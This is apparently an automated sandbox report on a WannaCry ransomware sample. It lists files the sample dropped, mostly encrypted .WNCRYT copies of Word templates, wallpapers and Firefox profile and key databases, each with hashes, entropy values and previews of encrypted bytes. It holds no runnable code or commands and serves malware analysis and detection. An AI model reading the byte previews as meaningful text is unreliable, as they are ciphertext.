                                Preview:WANACRY!...."..Q..0LlB.J.......|;...y"].....>;.7B2...XE..7=u.5C. U.......w?}-.....>M...0A.o.5.....T.4....8.$U.0....;.._D:}..)C(H.{....;...*..4......C.Ht..E.../...f.Q.d..@..m.}0.~.`6;....R@.Q..E^C.....[....7R/.0.j.+.s.!..6.tG.n8_.8d.7..M..C..}dD2.....X...T. .....r........$..7.....DH&g..4..".....mDa..KU]*...:.QA....'CU-..PT.....4.....<....=G..).@..sY..J.Db..i0b..>....z%...S........=..q......xO.H...Y....B..o..L-(...M4s>&5,f'...G*...S_.B8...=`%...aC...b....T:.....(......z.vl.x.k.g...!.D...8...|4..4..B..is.w..maR....}..5...Y......C .l7{........\..K..Y..%r...|Jh.8f|.....$7.+|..?Ul........x.`........&.G..+.?.L~N.'_.f.*/G..U...Mq. $..yp0...{...?.v..Z1muod....fA.2o9gK.+.(AG}W...q.3..oW....+.9.=0Iqj.8...Wf.....U......*i..(zD......c..p.E...PV.j-P...!...G.|..s.>.'.9.......kc...j...[....1..Z..d......~+..n.F...L.y.tf...v.".g.3......:J..b.rO...._K].M.$.97.>1*<N*....8UT.(....P?X.c..v.:.....Z!..%"....u....Mi..;Zb.LOV...Bj..X_.H[...O......Au.+.g..Za...9.}

                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835233[[fn=Text Sidebar (Annual Report Red and Black design)]].docx.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):47576
                                Entropy (8bit):7.996351379468486
                                Encrypted:true
                                SSDEEP:768:PIAnuiL98SeaPqel3jjy/c6xFaTJLaQ0Ux9SDNFHPA8YZP+zJst5xnkdRDysxO:AAnu+lRQUxsDNdAtP+zORniS
                                MD5:B918EC7728E524724F1CDFD950FB41F8
                                SHA1:6F8E1D5D48E13EEACE78E930AC2F951832C3CBB2
                                SHA-256:2FAD24BC329700A5368199743D33C94497D2E9377DA7FB7239A6B77B6C4EA69B
                                SHA-512:EAC79FF76430164C0115FED61D45E35E42E5DBE8F3B96A943771B54EB75A78A57B3634FE696707CF1B031D96404D02B05DDC97B75A6B4D5CE6ABE5960414D51F
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.....w...pKi...K. ...m..v&...=..3..qMpAs*E.G..r..5X...@`.Z...D9X."R..OX..4.^..".....ecH}a.W3j.8ft...A.......e.>.X*..Qa...*...e...<@&..^..........Zo(..5...Sc........U...*C../--...t.VK.5.........]....=Q...........Cw....{O.$.:...?j..../....>?.].v.................&....a.E....>.${......p.i....C'.^...=..t.....-..H.~..K.%.T..P....G.q..~u.8.'..|Z=.F.._...9..l.mmR84%.|y.9n. u.Z..d.'....G.....C}:..\=-+.........r..'...~/*..B..<...w..d.;..l.S...PH..j.TS..?...-....K.b._q...k@^...a.'1.t..x......SFh.$....B....;...!B.Z7....`~...;...,.{.\..R=.9..M..k......E 7......Q[...@..p?p.pp....M.&..".....<.F.....L.^..t....8.|..ee..d.[7.uZ..e....U....25O.6m..k.........T.a...D..;ZF'7M:.e.......w.*.W.o.Z...n.A..!......^YT...7..#..1...X8E.....qI.m...G6.....y..v..n..R.. .Pu:...^T.Z....j..."....g....Fm......f...B5.`.4.. ...+...X.&UF...;..W./+$R..57.8.R.$V..9%n.....k.;.4.........ch...8..\1/.;.88...d.+........3..9...{`..Y............o...5.....?...*.......*...4

                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM03998158[[fn=Element]].dotx.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):34696
                                Entropy (8bit):7.994598581571153
                                Encrypted:true
                                SSDEEP:768:kcigdwdx+ZerEfehP/eaTc6+7KkQeRlSZ0vZD/XNzJLWf0AqXo:k3dQZer4eNdw6y8SJvRHo
                                MD5:A199A84DAC2A9F726409FB1F3F2D996F
                                SHA1:A1BFE1F2CD408C7DDF05962F55BEA38042E88434
                                SHA-256:A4FA1B8D293D48375277B6C9BCDE75484993644AA351662C15B2AF40572A5C94
                                SHA-512:6CE028DD62F1C3E03213FF2437D8A057ED9CA379D1C6ECB9FFAB76F6CBAC89D5D7EAE86BFA274DDD48F274914F8323C3DBF20A8BE2B2A047225AB8B7EB0EBAB9
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.....`..8y?gJa.,..ir@.Q.0Q ..EH_...zmR'...x_.+Om.jo.O.Ju9.D.Mo.yf.#...i...d\.K.2.;...-.5?...97....2..c....w.n.w.2L.O....f....S.@1.....!.)."..i......w..Iw.'-.D..D.3..U.:..hY.$.LG..pAwR......G..;..FiG.9......3$"..Z`f.w>.*}-d..$...4>.Z........>.M.....o.......N....T.../WF.).5.{.....%...u.8....r.\.;G...}..).8#PVOk.I........|.\.k........R.>@Kf.pU..I....).:Q....}...Hp...t.J...r.0P}...E...{:....`.....e.u.1...d...b...=..g.._lF...G.....k.....).|:j..`D........#/....QS.....c^..0R...@.....aQ.(.......\........W:....Wj.Wi#^.\.X.|...uD.(..`...e.%...q....>._I...+.`.SD......o.I&........P..)(..rj......2q.\.~...F..=..EF.......r....*.....C.H....**5........Bn......4t.(D2.8.Q..!...."....Q'B...n..Jt..t.#............O....<Jb.K...z.?....1....\.d..h...m..7..7x..2.1s.....".?J..N!...VA.-.6p6-.>..#...........r.).[...~....^jk.`.g..."..R..~J9..T.&'.......ZJ..h..6.mk....S...*..[....Q...X...i..a.B.wp&.t...1....|.3....sP$}".Ba....b.........R............y.]

                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM03998159[[fn=Insight]].dotx.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):3465368
                                Entropy (8bit):7.99995237144597
                                Encrypted:true
                                SSDEEP:98304:5qMRDoROmiQeMUjeL4MSlHxOe8to8qB7L6DE1TAa:Qn1eMqxxmo8qBt
                                MD5:175D11FA61918FE712061DF2210E7F97
                                SHA1:00486413B416B640A17C2983A41FF194E90CE7C5
                                SHA-256:BC8FD8476108D87F46C27DBE02493E062972C79894622C48040FA277009DC240
                                SHA-512:4D23A0F03F7469C0F89B19F10DD54B992D986BD81569EEDFF4287E5267EFDD81AA15456F9997847649B3EEC7C3EEB5473F94C23FF33549EE4F94871CFC3DBD91
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!......9..kBf.a\....+zW........^....`q.D.~qu..x..o.},.+wB..&..|..{.H....'...f.........Eg...<9.}F;...?.A.p.|.{m..b....?.......W..G.....;NT......$..wG.I....Q........&..I.:.Q.o...Z...^.%2mCs<...a_.C......r.:..Vm..I9........Rz.I...{_.{^|.'...X.Y....t.4......)..I.l..*@e..FU~P,.%.......E....;...L....?...)...\.T..........."....D......{&@S."t..I..sm..@.\`...;...>g5>....cH.Ib#.5.N...p../................_.v#....l..m.S..0.+..O"..>.k>..:.z.M,H..}....`V...n...Z....p...&.............:.e.(.v.uR.w}H/..#.4..O....g......."..i.]i.....G..B...h.k..|a|...x+..1..x.X..&.,R...p/...;.EZh.Iy.Z.k1Ru>._.X..2r..+.qp.../!.].P.1.5Q.......5.0v.......Y....s..g<y6....v{..|.L.b%.~1"!..R.....".J.o.C......W.E&.~...g..+..4.(...6.v .....K.*......4S...Osb..y..g.+.NJ .6...j...^... ...N..c:.j.h.a%..<..x..B.G]..@k.........|.c...=... ,>.J.Z.$.:.T(...;...C.rv.`...D.;b.....M.G.qBVXN..3.c...2K%e ]..:.B..R.....-..g..e.IS.._...xn@..JQm:.v..c..y....`.M....;.f...o.....@.qM..

                                C:\Users\user\AppData\Roaming\Microsoft\Templates\Normal.dotm.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):19560
                                Entropy (8bit):7.991019120973622
                                Encrypted:true
                                SSDEEP:384:JP0ItloPY2CrxR0QCw1iLuv7DZhAYWEwULgiaGyyc6cxdyjFP4:ZCPCYTCZvhgi5yyJsyjK
                                MD5:D55A80B8DEAAD6E1AABF497402349060
                                SHA1:867EB8B063F48A7112603A2D0FAFA9F1BC9789BF
                                SHA-256:B395A5A9066E72EB588C4FA59EBE4C26A73BE3C5C59C83ABBFF256CC951D9B3E
                                SHA-512:23B920D3F4096B99DDDBFF92C9FA16AD3077C1AF1EC0F04274E0BB9A65319030DC8C1C3BEBC0194D05B7A2C51B3547B13563E11DF15CE17DAF6B2CB2092F280B
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!....H.;.I.M....@...S'.)..p.M.&!@........./d.m.Kt.[$..tK...d.V.zyz.....<V..s1P....I........L.....L...P..:..fE...q.......h:@.......h..U..m.m...`....m.+.........x..q.,...).aKh).5..b.nk.5p..}.yJ......^m..3...nr..:=..!m.~w.C.@.=...cx'.p..pw.0(..{.........GK.......wm<....f..\:.Az.v.[.Rz...5I8......yHz;..9...)Bf.J.<.Y.?S....F...g.j...........+.y6<...%.J^M%.........yj..Pj;...z....J.Fw....z&.^?.#...O..%d.Q/.."y....K. N4...s.QF.y.....?.......%@.,....#rhAt.K..l....7.z|..cI.O.....P..t.N.o...a./...cT..m..<f+.A.P.j.8.;.8.....sw...4){.Z...m`.ed..~.-.6c..s#........\,.>q@.......8....D..t.....Z.7.>...2\..v....l....70^....7.2.!.t.o?.PvK.&..!........vP./c0.8._.p.....,.5...8.n.....=4?k"..g.Z...)C.o...Vx...V.i....8`....Y.......e./z.N.V.......wT.9X..eL.d..m.Q..w.CD.o....&IB .H.<.m.A..cNL....mIV}...pL<....c\..X...N.&S.iSt.z.*..d...~......b...i..Pi..)NY.@..o-...MH..s.*C(.d.di......M....Y....wd.Y....)..pn....q.0.C.A..02..9......{.Q.!.F.X'..1.....~....J..d%Q6A.0

                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1024_768_POS4.jpg.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):40984
                                Entropy (8bit):7.995595406679536
                                Encrypted:true
                                SSDEEP:768:6qu5OgHQLsYLHSU857FRWjO0HG3YaqI4vw89blWR+g/i:hgHQLpLHeFsOiKB4vwwIE6i
                                MD5:FC29968C24759B854B7C57EAEFBB45B5
                                SHA1:ECC5CCAA47554B3AB01EC8FF5DD15E519C9F3A2F
                                SHA-256:F56374B89593DA2B66F37BC640896EAF73DD09BFA568087B28B8733E712943AB
                                SHA-512:B3E6694F2486C565600731B4B4EF8A46F00EEDCAD5134C4B5369838C5C2907F43A989BE71D8E8A27014E8E1D0D1A1F2A29044D6401CC3C3A42D28433BD852A04
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!......(..}z.....].t.a.V....of.Wd_?...;.OP..~.....8..<.Sp.C.....a....J.....o|a...,..N^.h. (...h.}.....,....+....y..u.+.j(.h....M........@....(.....J..v...4.{Q. ....[&.W......{..+..f:g.y\.2..Js'.\,6<......bN9D.Um..z0.7..Y_..a...a|v..G.s.\.s=S.Ii...'................=,>.h...$.F...,h.Z~.F]Lr....M........)R0i..Rh..e.P........ka<-sI,...z<...3....%%g.9.;.G....J..."Mu(l.=.../..O...a.........{.gd......L.H........Ac....'.{.(.....{?/.qt.Vp...K..<.v....g....#.|(Dzu.....p.6....r..Z>..S.V(^.EV....nx.W.f...'.8.b.a25...x...cG....d.V.......".k.;....dc..z.....B.\..`+.A..bt..N.e..Y.[.M,q{.G.]YN.....C6j..8S/..<.l..a...tY{...^%......;....\..Xx......>).HD.l.x...c.......?G*./v.p...D..:..s......H.m*.G........Ys...um.U..V..(...yS..L...s9..s....mMH....b..-.G`...l^..6..? .d.+.VA...N6r.1.....Y..{..iW..Ar.....Ip...q~.T.B.a.v.f5.@'G..@......zL.2.-..^\......"kJ........J.>..h.N.......?.$Y..<d......O..L.....:.`...."V ...[Kj..i........]....ij..K.)+.....

                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1920_1080_POS4.jpg.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):125288
                                Entropy (8bit):7.998553445878312
                                Encrypted:true
                                SSDEEP:3072:tE14rNsx9SzsvmgucpQ2pZyHzaBgTY6PBbtEZSLN:tEWrIksVjpQzYgnZbtV
                                MD5:07FC11CE9850703CFE71441FCAB3EA41
                                SHA1:B82DF49233927E9932AE21955FA560D3B45D2945
                                SHA-256:EA6FF0AAAD53A050E54FF471CE77DDC5C70F17866606401AED2E5F7CE4C5AC27
                                SHA-512:B28C6DB2EE79CC345ACFE5AAAF4B8A801E530FB5A8B97205C04DF122855187769D5D831F054FFEC146D6AF5458D7AD0CF6D86090F4003024D43683290F3ED48C
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!....f.. .A.. =.(ME..f..va._uS.)2...$..9.mP......Rp .~.%1ob/..^....I.%$...u....zL........`.. ......I]Z.k..sy..Ay...S.`._..Y.v.^..K..A...Q.........#m.&.?.+#......N.!,..#...UZ......./.......K..P...P.`..[@..]...b...x@..S^....Y...Q1.").Hr.x.......Ih.X1....D........P.<`....v.\..S.{..:...j.S..`..y,.nj..W.P..o.G.....F...|F^.i..}.p..#!94.d..&...6.....vo..:y.......m.....J.'l.t.:.Q.\o.G......r....6...".m6T.]... P..1C."./._.+8H..1. ...M..g....f"m/..}M..U.Y,.....V....o|s..$.\E@.!._..s..9.....y.Rl.eD.......2...-..,\...E............%w....k+.#.}m9kK....cv7j6....B.....-.c.+....FI>R.:.o..n.e.?.s4Oe.W!..>....+....<.08.*.6......tR.\..N4v...8...;.1.."=h...W``.q.....[5.:+U.33.R.n..L.M.e0.0#.....x.E>....b.t..fu...!..8R.v.-9W..Y.zC..J...Z.}..m..t..8....-w...K..z.=m$...m. ...].1;6c......W....9>..Q*..#..a.i...w...9..6.&.l....8.TW...G.^.L....A...MW...)..T2..U...fm,r...>x.Y..X..BB..;[..nU.K....fu1.dn+.q.....3M..J...U.I....v..Sf.. ....v.....CS..%?.......y1V

                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1920_1080_POS4.jpg.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):125288
                                Entropy (8bit):7.998553445878312
                                Encrypted:true
                                SSDEEP:3072:tE14rNsx9SzsvmgucpQ2pZyHzaBgTY6PBbtEZSLN:tEWrIksVjpQzYgnZbtV
                                MD5:07FC11CE9850703CFE71441FCAB3EA41
                                SHA1:B82DF49233927E9932AE21955FA560D3B45D2945
                                SHA-256:EA6FF0AAAD53A050E54FF471CE77DDC5C70F17866606401AED2E5F7CE4C5AC27
                                SHA-512:B28C6DB2EE79CC345ACFE5AAAF4B8A801E530FB5A8B97205C04DF122855187769D5D831F054FFEC146D6AF5458D7AD0CF6D86090F4003024D43683290F3ED48C
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!....f.. .A.. =.(ME..f..va._uS.)2...$..9.mP......Rp .~.%1ob/..^....I.%$...u....zL........`.. ......I]Z.k..sy..Ay...S.`._..Y.v.^..K..A...Q.........#m.&.?.+#......N.!,..#...UZ......./.......K..P...P.`..[@..]...b...x@..S^....Y...Q1.").Hr.x.......Ih.X1....D........P.<`....v.\..S.{..:...j.S..`..y,.nj..W.P..o.G.....F...|F^.i..}.p..#!94.d..&...6.....vo..:y.......m.....J.'l.t.:.Q.\o.G......r....6...".m6T.]... P..1C."./._.+8H..1. ...M..g....f"m/..}M..U.Y,.....V....o|s..$.\E@.!._..s..9.....y.Rl.eD.......2...-..,\...E............%w....k+.#.}m9kK....cv7j6....B.....-.c.+....FI>R.:.o..n.e.?.s4Oe.W!..>....+....<.08.*.6......tR.\..N4v...8...;.1.."=h...W``.q.....[5.:+U.33.R.n..L.M.e0.0#.....x.E>....b.t..fu...!..8R.v.-9W..Y.zC..J...Z.}..m..t..8....-w...K..z.=m$...m. ...].1;6c......W....9>..Q*..#..a.i...w...9..6.&.l....8.TW...G.^.L....A...MW...)..T2..U...fm,r...>x.Y..X..BB..;[..nU.K....fu1.dn+.q.....3M..J...U.I....v..Sf.. ....v.....CS..%?.......y1V

                                C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\AlternateServices.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):888
                                Entropy (8bit):7.7709234856926885
                                Encrypted:false
                                SSDEEP:24:bkWAAXeNPHQPVnaYlTsilAX90WEyuCbNWtY/z1YLNn:bkxeGYOilAXFbuCbYSZYLNn
                                MD5:2A9DCDEC4642240B53CDD247835386A8
                                SHA1:52B71AA054B37FC6371A09612568D240D32FA546
                                SHA-256:4322AFF96A8C7185AE4505DF24FC366553BEFF03F18A40BCD20977E679F06506
                                SHA-512:F3A57C99D54877804170D358A1B47BF52D09814FC468A52103ECAE2E137F53C6B1B088082A09E217636E08BF395C6B5ADEFC59FBF87425760563F70046AB35D0
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....}(T4*..%.zKm3E......\'.....KLH..S.:.0....mO8..j..l..e...I..2'...L.[{.6$.ly.o,..b.d....5.R.....=..g.S..f..uco..@K$shd)f..H.T.8H...w.=....\m+ B.....,...A.|..L..G....}....u+..x....7.ZS ..|`.}....7B~R...a.B.gq.g..J..]\lN....L...+.;.|...S.M...dV....X..........41Bz.+...9}.b...|....#O..|...m....Ft.lv..>....Yu$..C#.{<,.L....|..1l.g.Y ..[....*.k:.t..P.,Blr.,..^E.....:!.A.R............L....[...Y.+..%F.C...8..j@.!..+..."P....P1;.9...H.Uyn..Ls.s.P\z...,r]..)(.U@....R. ...dx/..X.>DS.`.P.4..4..*.L.k.K{.x..p..+.h......o(.[.T..R~..1.Z$6J.....ey..G..7K./(U....3l.E.t:...5........... .......bh{)[.........W.3......0K..I.x.r..e'...o...s7.)g../.~....wy......6.0^s...ub-T.......&09.._.....#......`{..P......=..+s.83.Gf.. 2..1....L~..8X.UM\.^.y,(W...U.Z..Q...b-.U.+...7......ns.I:6.....,..K..."....C..Y....(..;8eV/...>.A.0H.2.<$..zn:...G.

                                C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\SiteSecurityServiceState.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):888
                                Entropy (8bit):7.774113899585453
                                Encrypted:false
                                SSDEEP:24:bkhbW31RyAhFZYzd/Haw4fLJdfmkMyLvAhaVBeyfQr:bkhbW31RJsd/HaxJTLvAhaVBeyor
                                MD5:9EF48ABAAA6D22EF8144B8B624728AEE
                                SHA1:A4433A1A25D70F2E8124AA8EC3527BA2692550E4
                                SHA-256:3E971E7B7D23147603D2E312EF0D4051CEFBF159C414CFC4C0DAEAE30459DD5C
                                SHA-512:F3B27FE6874DC1E2A2952FED49C64C2E23C8E75D7660C958CC77CDCBBAE0B00FD5B39C09743707F5217D94820875CE19BCBE4EEF8A1F5638BF839BF12D73E39D
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....b.6.s.o.6.X..H.............+;....5`."`..aJ.. ..F.=...si..oy..{@..5.u.Vp.... U.i.......E_.U...p3..1.+.Fu.1...f"$x[]..4......p.....E..~9.l.i.<t.uu~......X.....L.g...~.B.w.)..M../:S..??...g.........dV.w..Al..1...8-.T..H......7...........<.| 3`....W.......@....Z...A.4.knS.oj.:4...k....w;..C...r....6~..K...?....l.....v...].91Y..b..Wx..=.y.#...D(.".9..e...F,.......V.].]g.(..e.#/............H.T.fF...7.....)b....L...RA.Z.V....R|'#...}..+KbY..M}.[L....e...9...s_.?...}....4R.P.-..X.....!.q.Y.."C..j@E.w..!..k.+.a.#_..W..!ng2..`..>..)b..S..[e....V.......IUWS.....ym.~.h.'_..;..h].........Z..Q..4ru3.LH...).C.pv...b..9:..H.{S..r.....V.r.O}P.S..j...0!h.........g9.K..b.l..;.[.4...FA[..[..O.=.$..a.]LME..?..W..l.}...)".:x_...&l.%GF...q....I./W........N....V...3...d...i?.}B...k..`@H<E...d...a.h.D....4..S...)\.......(.7._.0...

                                C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cert9.db.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):229656
                                Entropy (8bit):7.999204363239014
                                Encrypted:true
                                SSDEEP:6144:IsOkPpIlGNMNuY7MBAZFo8UJJmBpSWTgz1egE:Is/P2lfDM/8U3m7SHegE
                                MD5:B4A202DDBF8E194DF1517A4BA0D91BE9
                                SHA1:00568D99CB33E1A93B117B17A50771F99D24BDC4
                                SHA-256:D771E4B8A1B5624E31CA0A4719F7273F395ED25621E4BDB5B0EF38D384EE865C
                                SHA-512:15ED034049389B54EA5BA4518CB6EDD37555C231412E36709C3DA2887CAA7F87F37FBDBAC288AD13E75C3A3C1C9795EE9C1CF66E9DEA9CA9C24AC68785FADCBA
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!....a....u...m..{d..(S-].... .qBa.....M.......<I...U.M.'+(..9...w.../'0......Hz(u...:...M.fi\.n....h...#....Q..v.:@.E\...n.3?.a....A.+,vU...*......A.D..w.8.)..|d...c.uO......3hZP.d[E.u.>w~.G4m.p7......wB.K1.m..!vh+.kw..J....2.[..r3[`8..|5......v.o..............R.Q.FJ.v.m*.?.}.l9..~..V..<.7gUc.Y..Y8F:RGQ.H#.`i..........G.]]Q=...SC.....n.. -....?.!.....?...43t. B..a.f..<[....c.n....]..<ol+.8...Y8..._.o.KjG]..U*.."..!..-.......6.wF.=$...,..?..`..+D....s.........}\...PxB.F$tj`.v..I......r*..A{n.z...C....9.)..L...c..B..u.p.......gF.......)y.W..Z...o....8.2A.Z...F.._$eb...t"!.l..t.....:8...X..%qcN...~....5.J..C.-$...}UQqi.Q.7.i?....!..D..e....Ay..5..f..Jm...V..`u...l.J/f"..#...NfqTQ...r{.j8-..A}..y..X#9....-Q.. ..@.%..4.1....p.-....fmC...X....>.f..wG.fnvL...lT...../.&..G..XW.2....dg...Y,A.G..zi.....0.P...b..'..bL.(.&1..|.....R6...4.l.f....P..s.{.h..[...L.uD ..Mi.F.......so....d.[g-#....M.Qw.J..]..4k1.6......;+g..;...D..1..<..4...3.+.J.!.

                                C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\gmp-widevinecdm\4.10.2209.1\LICENSE.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):760
                                Entropy (8bit):7.743982442250135
                                Encrypted:false
                                SSDEEP:12:bkEeI3FUWOMnYaDzBe85pzSnXED43RtTjrrek/kx7k8ZslE2ObSIjd8cD5rRP9Fo:bksFUBMxh+XE+RtnGk/kx7pZMCjdJD5+
                                MD5:B7F081CC88CEBFA3E06479491DD1B5CD
                                SHA1:4263EE42534A40C08799B5B9F1A273E604A9068D
                                SHA-256:B23E07AAEA0BFB76AD68A11DBDEEF7C7BCBD6C844FA310771ABA8D2119765034
                                SHA-512:CD1AB6AB7110396E4AC0643A08D0727B603F240B1AEDB10EC3F62DA62C813DEF0FB91A429786B7E10CC90505F65FC948AE8838E6579DC85BB834CF78A86273A5
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!......RZ.;.....9H.K=.a...$...|;..Em............U..YO..-..Qq.....G<.,...`.(..d;..aE~>....S..\5..C?=.z.} .6&..q.....-;D1....0bs..2of,...Id?.f.:.<........|..>../e".:&..BJ.Vx....U.....<...P1.S2..x...?..'z....~...\M.Q)..D.$.^........&..9mja_._.N._Ij`....Q..............D..I.c..hv.-.....Ww...$...93..[.".39zH....O....6..yz.Y...%BKK]..Y..%..E..e./..@.!....dJ..c.r..p.......xr|..4.rk..A.a...+d.T.._...G..Mn0.l....`....jG!3..@.O.,.l ..._..k...{..s5...{....Us]i.B.d.....XY%w7.....?SnA....KA..t.(.a.$csW.......Vh.`.........}.pU....4j6..s.fur....`.A..'.bPI....].m.7S..+...gtb.m.....k...=..._}.e.....!.Z.w..(....=&............pl..b.V.p...T[u'...8].~...g.......X.......g..;.5.q0A.4...x..F.S% ..N!.,.H.G.*.$gY......7..........r......

                                C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.db.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):295192
                                Entropy (8bit):7.999372656043149
                                Encrypted:true
                                SSDEEP:6144:+4/AQYodB7N6P3Nqz5Cbu8TUGJAB/cpCvOzK2nHk66Fp0y:1A3wC/kzwVTUeABYhnk66Fb
                                MD5:8676BAD163216BD03243BA57E3A6BCD0
                                SHA1:3BAE9977184CD163447BE8E81A371360445E437F
                                SHA-256:F94B9DCFC704B4D04B332785B6B8B4E874BCDC01C835193B1808FA0F7413BAB9
                                SHA-512:0BA390C02E35872384D9844327C105650059F2523EFE2CC7622EACD8EA5E3DD68C632F42DADAEA8593AF76EE4EED9CF99281EB67B9D85E076057C8168CB2D2B1
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!......k..X9....el..fF.y........7.~q..F...........qS...'..?.(..B...f..~X....... ORD.......T.@..p...........:.LM.....o..C.y.S..}..M..d.${K............,..h[%.(U....o.*.....l..V]s.....i.*sw../...F..X~.....P<...G....o.......)....7..N......V:.-...g..................V..m.....@..........p.....6[y.DN..q.o..Z.D....e....>....`.i5.J..Wx.-iG....y.....2dv...j.w.j........Z..=.)0.0%'.0em*....Qo...M..O@.6TL..Xj.:..x.R..L5..#H..... s<..k........b..Wx&k.....s..\...R...^gwG...v:..'.7;W={6.4a.4.q...B. N.;+.i1j.6.\B......f...".I.ZG}...`q..V.W.w...4.....!e.X^.%...b-.ox).Wd.;&M;.w=......9.F..1.'OFK^..h...G..bi...^@..n....}Q....!...-|r\.....!..:.!..T_..b...+..M.-./~...;$.........EI]%..p]..,KG.X)...V..Yy....Ho.P.)..dc+....9.Qxb.R...........k.J6...9.j.k._...f..#m...A.....P......v......)..3c....9..E.c.:.2.=.)..;..#....f...q....+a.81s4k.)#.i~4a|.H....IV^"A..._H....Mm......[.U.....z..y..t.*....8...y...Z.{6....V.v?`....x.'.4%.BX.0....wX...R.?.@..oh.m....

                                C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\pkcs11.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):792
                                Entropy (8bit):7.783218655260832
                                Encrypted:false
                                SSDEEP:12:bkEmP0nggDqBHNS98vIfkGMkzjNS4hQPar55pBgm6/ON0uWwSJ3p7Q3HWrUlgXWn:bkRsggD5YGMk1j1rPPoGNcJ3VCn
                                MD5:5D5FC625F651C390F8FDE465303D4030
                                SHA1:7B03367E8A90FBF07CCC085E31366E02CA3BE5AD
                                SHA-256:1540743BC554F779F6236D4F0FEF9718D8451424C9D928F21088840475B9C8B7
                                SHA-512:1138EB3C95C709BA04F9BCFC7DEEFA4CDF23B42119EFCF84060A3E541091D63C2D49C5E3A42E8B0BE09150CB72C8BCC36393B61629538F69F4A5D405B075B11E
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....?........r..}.\.....S.5....A.X6.R.~...9.cN@.....=.?G..,....$..hf...7..N.!*.h.....A.&../.....u.g.y....t....M.....t.;O......Dsu.M..@.i...j...ar+..|.....%..7...j.c.).XK.DS.p-@..S^&..p..27..7_..YJ.]Q...............Y...k..[...........\)..1....C.N...............h$.....'J..j2`P(..u..`<q-{.S.... .P>(.g.}#.).$...g@...|...../....FY..-.H..py./..!N..6....IvOS.p..7.........z..9U.N.d...B..:...qP....".P....N..K.s.v...S>4.....C........f.<w....3-..A:....8...r.'R0.}..%..5w{~......J6..WXP.'........8....G.k.9....1..JS.`....B./{...3[..a.....l.../;.L..K......1.5:`.........e..`.:..?+I.....=:>E`I.u......-..h,p...r...4.c...~.B...T)}..u.&.X..^.i;x...\HV'P#..d2)k..*..{.0O...6.<....(.H.F...\{..rR=8.f..oLD...1.vH..tK...Gf....22D..K.g..t8[.{Z..n).bt.YB....R,+q..

                                C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\prefs.js.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):12216
                                Entropy (8bit):7.9846233948756895
                                Encrypted:false
                                SSDEEP:192:BdHZXezdMGLVHKFlMkbQB2l57Miy18g8RHcfgI3cAYnJq0i+AEDeUrhrntujMg8c:B90zmQylFl5mhfgI3cAYnJq0i+7eCtg3
                                MD5:8F57E3A903666AD3C8B590A5D3693C96
                                SHA1:74AAD5D0990BDE811C1490E03A14EA47AF10E1A9
                                SHA-256:DD3486D2F5E75E2F48BA02847794CC123AA76AC9D71069B77CC75BF18A771045
